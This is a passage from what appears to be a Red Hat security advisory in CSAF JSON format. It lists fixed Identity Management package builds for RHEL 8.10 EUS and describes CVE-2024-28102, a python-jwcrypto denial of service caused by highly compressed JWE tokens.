"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "JWCrypto: denail of service Via specifically crafted JWE"
},
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
